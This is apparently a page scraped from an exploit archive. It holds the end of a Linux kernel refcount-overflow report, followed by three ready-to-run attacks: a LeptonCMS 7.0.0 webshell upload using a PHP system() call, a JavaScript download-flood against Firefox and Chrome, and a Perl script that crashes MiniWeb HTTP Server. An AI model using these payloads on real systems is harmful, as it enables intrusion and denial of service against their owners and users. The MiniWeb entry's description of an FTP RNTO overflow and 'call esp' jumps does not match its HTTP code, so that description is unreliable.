reference paths that can hold references to `struct cred`, and what kinds of
multipliers or global limits apply at every point in this reference graph.

I think the kernel should be using some flavor of saturating refcounts as the
default choice, at least on machines that have enough RAM to store 2^32
pointers.
If there are specific cases where the overhead is undesirable, I think we
should only omit such a check if we can document exactly how many references
can exist at most, with enough warning comments scattered around to ensure
that the assumptions can't accidentally be broken inadvertently later on.

(Or the kernel could limit SLUB to a maximum of 32 GiB of memory except for
specially marked slabs that store objects guaranteed to not hold multiple
references to the same object, but I think people would probably hate that
idea.)

(But note that refcount hardening also has value for protecting against bugs
where some repeatedly executed codepath forgets to decrement the refcount,
letting it drift up until it wraps around; and that kind of bug is also
exploitable without using ginormous amounts of RAM.)


This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2024-02-26.




Found by: jannh@google.com

</code></pre>
<pre><code>## Exploit Title: LeptonCMS Version 7.0.0 Remote Code Execution<br />### Date: 2024-1-19<br />### Exploit Author: tmrswrr<br />### Category: Webapps<br />### Vendor Homepage: https://www.lepton-cms.com/<br />### Version: 7.0.0<br />### Tested on: https://www.softaculous.com/apps/cms/LEPTON<br /><br />1) Login with admin credentials > https://127.0.0.1/LEPTON/backend/login/index.php<br />2) Go to the Languages page > https://127.0.0.1/LEPTON/backend/languages/index.php<br />3) Upload an upgrade.php file on the Languages page > <?php echo system('id'); ?><br />4) After clicking Install you will see the result<br /><br />### Result: uid=1000(lepton) gid=1000(lepton) groups=1000(lepton) uid=1000(lepton) gid=1000(lepton) groups=1000(lepton)<br /><br /></code></pre>
<pre><code>Minor firefox DoS - semi silently polluting ~/Downloads with files (part 2)<br /><br />Tested on: firefox 121 and chrome 120 on GNU/linux<br /><br />Date: Thu Jan 18 08:38:28 AM UTC 2024<br /><br />This is barely a DoS, but since it might affect Chrome too we decided<br />to disclose it.<br /><br />If a firefox user visits a specially crafted page, then firefox<br />may create many files in `~/Downloads`.<br />The user is notified about this in a small dialog, but there is<br />no option to stop the downloads.<br />The potential denial of service is that the user must manually<br />delete the created files and this might be a PITA, especially on<br />a phone.<br /><br />The code basically is:<br /><pre><br />URL = "data:text/plain;,a";//can be very large with no net traffic<br />link = document.createElement('a');<br />link.href = URL;<br />link.download = 'joro_';<br />document.body.appendChild(link);<br />function f() {<br />if( !confirm("This will ruin your device with probability up to 199.99%"))<br /> return;<br />setInterval("link.click();",1);//good<br />}<br />f();<br /></pre><br />There is no network traffic and in about 90 seconds firefox 121 created<br />3434 files at a speed of about 38 files/second.<br /><br />google chrome 120 prompts about multiple downloads, and if the user<br />allows it, it creates files at a speed of 4.2 files/second, but<br />it gives modal prompts, which we couldn't close from the GUI and<br />had to kill the process.<br /><br />[Test online][1]: if you are vulnerable<br /><br />[1]: https://j.ludost.net/download2.html<br /><br />-- <br />guninski<br /><br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket;<br /><br /># Exploit Title: MiniWeb HTTP Server 0.8.1 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 19 January 2024<br /># Vendor Homepage: N/A<br /># Download to demo: https://drive.google.com/file/d/1AVHSlsYj5Ukw9co9M2Ql6RsqCTzbI038/view?usp=sharing<br /># Notification vendor: Not reported<br /># Tested Version: MiniWeb HTTP Server 0.8.1 - Denial of Service (DoS)<br /># Tested on: Windows XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Video: https://www.youtube.com/watch?v=HbAy3RvHpAI<br /><br />#1. Description<br /><br />#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The FTP server does not correctly handle the amount of data or bytes sent to command RNTO.<br />#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denial of Service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> # $^O reports "MSWin32" on Windows perls; pick the matching screen-clear command<br /> $sis="$^O";<br /><br /> if ($sis eq "MSWin32"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /> # oversized POST body that the server fails to handle<br /> my $payload = "\x41" x 2038;<br /><br /> my $http_req = "POST /index.html HTTP/1.1\r\n";<br /> $http_req .= "Host: $ip\r\n";<br /> $http_req .= "From: header-data\r\n";<br /> $http_req .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";<br /> $http_req .= $payload;<br /><br /># $ip and $port are the package globals filled in by main() from @ARGV<br />my $socket = IO::Socket::INET->new(<br /> PeerAddr => $ip,<br /> PeerPort => $port,<br /> Proto => 'tcp'<br />) or die "[-] Could not connect\n";<br /><br />$socket->send($http_req);<br />$socket->close();<br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print q {<br /><br /><br /> _/| <br /> // o\ <br /> || ._) <br /> //__\ <br /> )___( <br /><br /> [+] MiniWeb HTTP Server 0.8.1 - Denial of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /></code></pre>